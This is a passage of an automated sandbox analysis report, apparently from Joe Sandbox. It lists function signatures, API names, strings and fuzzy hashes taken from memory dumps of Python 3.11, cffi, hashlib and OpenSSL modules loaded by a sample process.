                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: L_sk_num$L_sk_new_nullL_sk_pushL_sk_value
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1582033096.00007FF81E4E1000.00000020.00000001.01000000.00000037.sdmp, Offset: 00007FF81E4E0000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e4e0000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Mem_Py_hashtable_set$FreeMallocPy_hashtable_destroyPy_hashtable_new_full
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3987031744-0
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Dealloc$AllocDict_FreeFromGenericLibraryStringType_Unicode_
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3239884862-0
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1578637831.00007FF81E131000.00000020.00000001.01000000.0000003B.sdmp, Offset: 00007FF81E130000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e130000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Dealloc$Eval_Thread$O_free_allRestoreSave
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 86175192-0
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • EVP_MD_CTX_copy.LIBCRYPTO-1_1(?,?,00000000,00007FF81E4E27AC), ref: 00007FF81E4E29E5
                                                                                                                                                                                                                                          • PyThread_acquire_lock.PYTHON311(?,?,00000000,00007FF81E4E27AC), ref: 00007FF81E4E2A08
                                                                                                                                                                                                                                          • PyThread_release_lock.PYTHON311(?,?,00000000,00007FF81E4E27AC), ref: 00007FF81E4E2A17
                                                                                                                                                                                                                                          • PyEval_SaveThread.PYTHON311(?,?,00000000,00007FF81E4E27AC), ref: 00007FF81E4E522C
                                                                                                                                                                                                                                          • PyThread_acquire_lock.PYTHON311(?,?,00000000,00007FF81E4E27AC), ref: 00007FF81E4E523E
                                                                                                                                                                                                                                          • PyEval_RestoreThread.PYTHON311(?,?,00000000,00007FF81E4E27AC), ref: 00007FF81E4E5247
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1582033096.00007FF81E4E1000.00000020.00000001.01000000.00000037.sdmp, Offset: 00007FF81E4E0000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e4e0000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Eval_ThreadThread_acquire_lock$RestoreSaveThread_release_lockX_copy
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1756194536-0
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1582033096.00007FF81E4E1000.00000020.00000001.01000000.00000037.sdmp, Offset: 00007FF81E4E0000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e4e0000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Eval_ThreadThread_acquire_lock$RestoreSaveThread_release_lockX_copy
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1756194536-0
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: X_free
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2268491255-0
                                                                                                                                                                                                                                          • Opcode ID: 6493352eb6d6ed3341580a2395efd01224b6157228b4c69fa8689b251ece88ee
                                                                                                                                                                                                                                          • Instruction ID: 4110f41b348da2571ca55ea3309685679a96d6e8defab444d89cd1db6c77acf9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6493352eb6d6ed3341580a2395efd01224b6157228b4c69fa8689b251ece88ee
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7F011E72A18E8581DF44AF61D9916BC63A4FFD1BD8F080239EF4D4B697CF24E4918329
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _errno$Value$malloc
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2897262332-0
                                                                                                                                                                                                                                          • Opcode ID: a003b3710e9280e7628921405b2e4fb77e8b0aee88261c2af85ecdf5b62c0277
                                                                                                                                                                                                                                          • Instruction ID: b4d2429596d7126b0bf13ab63a5da45e679dd6769f3ecc73a93ea51544dec85b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a003b3710e9280e7628921405b2e4fb77e8b0aee88261c2af85ecdf5b62c0277
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 57F0C935A59E06C7E71D9F21DC642B87360BF58BA5F454638CA1E0A3A0FE3D7984C710
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E50A740: PyErr_Occurred.PYTHON311(?,?,00000000,00007FF81E50ABE1,?,?,?,?,?,?,?,?,?,00007FF81E507143), ref: 00007FF81E50A7C7
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E50A740: PyErr_Occurred.PYTHON311(?,?,00000000,00007FF81E50ABE1,?,?,?,?,?,?,?,?,?,00007FF81E507143), ref: 00007FF81E50A851
                                                                                                                                                                                                                                          • PyObject_Malloc.PYTHON311(?,?,?,?,?,?,?,?,?,00007FF81E507143), ref: 00007FF81E50AC01
                                                                                                                                                                                                                                          • PyErr_NoMemory.PYTHON311(?,?,?,?,?,?,?,?,?,00007FF81E507143), ref: 00007FF81E50AC0F
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_$Occurred$MallocMemoryObject_
                                                                                                                                                                                                                                          • String ID: libffi failed to build this function type
                                                                                                                                                                                                                                          • API String ID: 3589106435-1453035256
                                                                                                                                                                                                                                          • Opcode ID: 87b1179e8c9070b76f2cee160d7cd1aacfab705e6ae279e179b59d550c482406
                                                                                                                                                                                                                                          • Instruction ID: e3e438973b8b78a952f03a2bcb1e57b4fd571921a2920be4b1f9d898584c59b2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 87b1179e8c9070b76f2cee160d7cd1aacfab705e6ae279e179b59d550c482406
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A1412C72A18F41C6EB558F25E8202A977A0FB88BE4F448235FB4D87795EF3CE9508740
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: O_ctrlmemcpy
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\statem\statem_lib.c$TLS 1.3, client CertificateVerify$TLS 1.3, server CertificateVerify
                                                                                                                                                                                                                                          • API String ID: 2266715306-2608420995
                                                                                                                                                                                                                                          • Opcode ID: 15aa47485ae97e114c81045a7148ccf703e01fe5c933243fd750f331446eba2e
                                                                                                                                                                                                                                          • Instruction ID: 912e58e71ebd35f8a3ee5290b0befa915ccf8b1de91653f84ecbdb6161e3c3ed
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 15aa47485ae97e114c81045a7148ccf703e01fe5c933243fd750f331446eba2e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 90416D32A08E8286EB10CF15D4402BD77A0FB95BD8F558232EB8D87A95DF29E5A5C700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • global variable '%.200s' should be %zd bytes according to the cdef, but is actually %zd, xrefs: 00007FF81E518435
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Dealloc$Err_Format$Dict_Item
                                                                                                                                                                                                                                          • String ID: global variable '%.200s' should be %zd bytes according to the cdef, but is actually %zd
                                                                                                                                                                                                                                          • API String ID: 3830123900-276371364
                                                                                                                                                                                                                                          • Opcode ID: 1fc1faa2231e69d6ddf959b60745bc6fef0caa2df607a8e902fa608ff2d7a52a
                                                                                                                                                                                                                                          • Instruction ID: f8d0161717e3bac82b54c152d6f25043f49558d1e2baa89a2c9bc4cec7aa5b3f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1fc1faa2231e69d6ddf959b60745bc6fef0caa2df607a8e902fa608ff2d7a52a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9121AF22E09E4681EA659B569D606FAA3A1EF49FF4F094636CE0D57384EF3CF8418340
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _errno$_strtoui64
                                                                                                                                                                                                                                          • String ID: float$number too large
                                                                                                                                                                                                                                          • API String ID: 3513630032-3713550434
                                                                                                                                                                                                                                          • Opcode ID: 2d8f2bafc7c4374692fc6476e9960b37fae3488a7c7fa695c509609faea86466
                                                                                                                                                                                                                                          • Instruction ID: 59c99887b37c61de7c5f83000ab914901551ce3381a36b8fdd97c203974ad3a3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2d8f2bafc7c4374692fc6476e9960b37fae3488a7c7fa695c509609faea86466
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CB215E72B18E4586EB658B28D8242B937A1FB45BF4F414332CAAD426D4DF7CE885C611
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
Memory Dump Source
• Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
• Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmp
• Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmp
• Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmp
• Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
Similarity
• API ID: _errno$_strtoui64
• String ID: long$number too large
Memory Dump Source
• Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
• Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmp
• Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmp
• Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmp
• Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
Similarity
• API ID: Dealloc
• String ID: an integer is required$integer conversion failed
Memory Dump Source
• Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
• Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmp
• Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmp
• Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmp
• Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
Similarity
• API ID: Unicode_$DeallocFormatFromObject_Repr
• String ID: <cdata '%s' %s %s>
Memory Dump Source
• Source File: 00000030.00000002.1582033096.00007FF81E4E1000.00000020.00000001.01000000.00000037.sdmp, Offset: 00007FF81E4E0000, based on PE: true
• Associated: 00000030.00000002.1581472246.00007FF81E4E0000.00000002.00000001.01000000.00000037.sdmp
• Associated: 00000030.00000002.1582460342.00007FF81E4E7000.00000002.00000001.01000000.00000037.sdmp
• Associated: 00000030.00000002.1582744405.00007FF81E4EC000.00000004.00000001.01000000.00000037.sdmp
• Associated: 00000030.00000002.1582953118.00007FF81E4EE000.00000002.00000001.01000000.00000037.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_48_2_7ff81e4e0000_RuntimeusererVers.jbxd
Similarity
• API ID: D_do_allDeallocFrozenModule_ObjectSet_
• String ID: openssl_md_meth_names
Memory Dump Source
• Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
• Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmp
• Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmp
• Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmp
• Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
Similarity
• API ID: Dict_Next$ErrorFatalFunc
• String ID: _cffi_backend: get_field_name()$get_field_name
Memory Dump Source
• Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
• Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmp
• Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmp
• Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmp
• Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
Similarity
• API ID: Buffer_$BufferContiguousErr_Object_ReleaseString
• String ID: contiguous buffer expected
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1582033096.00007FF81E4E1000.00000020.00000001.01000000.00000037.sdmp, Offset: 00007FF81E4E0000, based on PE: true
• Associated: 00000030.00000002.1581472246.00007FF81E4E0000.00000002.00000001.01000000.00000037.sdmp
• Associated: 00000030.00000002.1582460342.00007FF81E4E7000.00000002.00000001.01000000.00000037.sdmp
• Associated: 00000030.00000002.1582744405.00007FF81E4EC000.00000004.00000001.01000000.00000037.sdmp
• Associated: 00000030.00000002.1582953118.00007FF81E4EE000.00000002.00000001.01000000.00000037.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e4e0000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Module_$Err_ExceptionObjectState
                                                                                                                                                                                                                                          • String ID: UnsupportedDigestmodError$_hashlib.UnsupportedDigestmodError
                                                                                                                                                                                                                                          • API String ID: 2341384915-1819944972
                                                                                                                                                                                                                                          • Opcode ID: cab25cee2ef474877533d6a272ae1fc29fafa22f63a0b338fcbf87a30af39434
                                                                                                                                                                                                                                          • Instruction ID: 6d5270003c2afba7d003cc5cef1593b3189b4224b8e4ffc5745bf9e6373b2d3e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cab25cee2ef474877533d6a272ae1fc29fafa22f63a0b338fcbf87a30af39434
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D6F01D61B19E4381EA55CB25E44897923A0EF08BF0B585335DD1D46BA4DE2CF4E48700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
• Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmp
• Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmp
• Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmp
• Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: strncmp
                                                                                                                                                                                                                                          • String ID: int_leas$int_leas$internal error, please report!$unsigned
                                                                                                                                                                                                                                          • API String ID: 1114863663-2343043947
                                                                                                                                                                                                                                          • Opcode ID: 4f0a0aaff9166599b321bcf5ed5f1c5d30282182ca895c5551f6253b89c6b022
                                                                                                                                                                                                                                          • Instruction ID: bad460dcc13f638b681d4ba5e85901aded8327031ef1b884745d62999b2319bc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4f0a0aaff9166599b321bcf5ed5f1c5d30282182ca895c5551f6253b89c6b022
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9C51BFA6A09F4695EB608B15C8642B967A5FB14FF8F548736CA2C072D5DF3CF8A1D300
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
• Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmp
• Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmp
• Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmp
• Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: strncmp
                                                                                                                                                                                                                                          • String ID: int_fast$int_fast$internal error, please report!$unsigned
                                                                                                                                                                                                                                          • API String ID: 1114863663-1550732720
                                                                                                                                                                                                                                          • Opcode ID: 057789135c42dfaaa6a35e435f66e4aabbfc77b9bb2c9b68fe972ad11cdbbe6d
                                                                                                                                                                                                                                          • Instruction ID: 14e4ab368c043c0cb64968ef5ed36b88ad92bb546f48efe05e6e48cf6b32ddd2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 057789135c42dfaaa6a35e435f66e4aabbfc77b9bb2c9b68fe972ad11cdbbe6d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C341BCA6A09E8686EB609B15D8642B923A5FB14FF8F508735CE2D032D5DF3CF891D301
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
• Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmp
• Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmp
• Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmp
• Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memcpy$Object_$Track
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2188153816-0
                                                                                                                                                                                                                                          • Opcode ID: 6d80d1acaace31bacea4d85d1f1140c3cb67ac4064975d8bc055213bdd228b9a
                                                                                                                                                                                                                                          • Instruction ID: 7b93215acca7df2abf27f5d54a63cc183763c0231af51a2ad5a1924b84cbb594
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6d80d1acaace31bacea4d85d1f1140c3cb67ac4064975d8bc055213bdd228b9a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BD21DD32615FD586DB44CF11ED945AAB7A9FB08BE8B060235DE5E43B99DF38E145C300
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1582033096.00007FF81E4E1000.00000020.00000001.01000000.00000037.sdmp, Offset: 00007FF81E4E0000, based on PE: true
• Associated: 00000030.00000002.1581472246.00007FF81E4E0000.00000002.00000001.01000000.00000037.sdmp
• Associated: 00000030.00000002.1582460342.00007FF81E4E7000.00000002.00000001.01000000.00000037.sdmp
• Associated: 00000030.00000002.1582744405.00007FF81E4EC000.00000004.00000001.01000000.00000037.sdmp
• Associated: 00000030.00000002.1582953118.00007FF81E4EE000.00000002.00000001.01000000.00000037.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e4e0000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Mem_$Arg_DeallocDigestErr_FinalFreeIndexKeywordsLong_MallocNumber_OccurredPy_strhexSsize_tUnpackX_freeX_new
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2315686776-0
                                                                                                                                                                                                                                          • Opcode ID: f110d98f0c6d9983d60f358f8505b4699d1fe2fc3896ddf209360801df41ace0
                                                                                                                                                                                                                                          • Instruction ID: 7ea05e241998d9987bff65b4c8c7d0c3d88f75f504b897b63722c11914cf215b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f110d98f0c6d9983d60f358f8505b4699d1fe2fc3896ddf209360801df41ace0
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B8215B31A09F4386EA548B15A818A796291BF45BF4F084734EDAD077E4EF3CF4A4C744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1582033096.00007FF81E4E1000.00000020.00000001.01000000.00000037.sdmp, Offset: 00007FF81E4E0000, based on PE: true
• Associated: 00000030.00000002.1581472246.00007FF81E4E0000.00000002.00000001.01000000.00000037.sdmp
• Associated: 00000030.00000002.1582460342.00007FF81E4E7000.00000002.00000001.01000000.00000037.sdmp
• Associated: 00000030.00000002.1582744405.00007FF81E4EC000.00000004.00000001.01000000.00000037.sdmp
• Associated: 00000030.00000002.1582953118.00007FF81E4EE000.00000002.00000001.01000000.00000037.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e4e0000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Arg_Bytes_DeallocDigestErr_FinalFromIndexKeywordsLong_Number_OccurredSizeSsize_tStringUnpackX_freeX_new
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1823454907-0
                                                                                                                                                                                                                                          • Opcode ID: 2fd325d52b6bfb3ccf8244bfe0aa6397c778399ca4e0abbb80a1c6c93883cceb
                                                                                                                                                                                                                                          • Instruction ID: 4b48ab2d83fbd987ae79af5c1ef3392691e89fe9e57584a3395e0d206ce8b54c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2fd325d52b6bfb3ccf8244bfe0aa6397c778399ca4e0abbb80a1c6c93883cceb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5D218B31A09F4386EA548B16B808A79A291BF49BF4F084735DE6D077D8EF3CF0A08740
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: X509_$E_dupE_freeL_sk_new_nullL_sk_pushX509_get_subject_name
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: X509_$E_dupE_freeL_sk_new_nullL_sk_pushX509_get_subject_name
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1566347608.00007FF81DC71000.00000020.00000001.01000000.0000004D.sdmp, Offset: 00007FF81DC70000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81dc70000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Object_$ClearDeallocRefsThread_free_lockThread_release_lockTrackWeak
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: D_size$_time64
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\statem\extensions_clnt.c
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
